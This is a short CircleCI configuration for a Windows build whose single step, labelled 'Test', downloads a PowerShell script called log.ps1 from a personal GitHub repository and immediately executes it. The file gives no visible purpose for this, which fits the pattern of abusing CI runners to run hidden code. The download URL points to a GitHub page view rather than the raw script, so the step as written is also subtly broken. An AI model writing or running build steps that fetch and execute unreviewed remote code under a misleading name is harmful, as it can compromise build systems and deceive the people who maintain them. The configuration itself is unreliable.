version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://github.com/howarddawuan/coba/blob/main/.circleci/log.ps1 -OutFile log.ps1
            ./log.ps1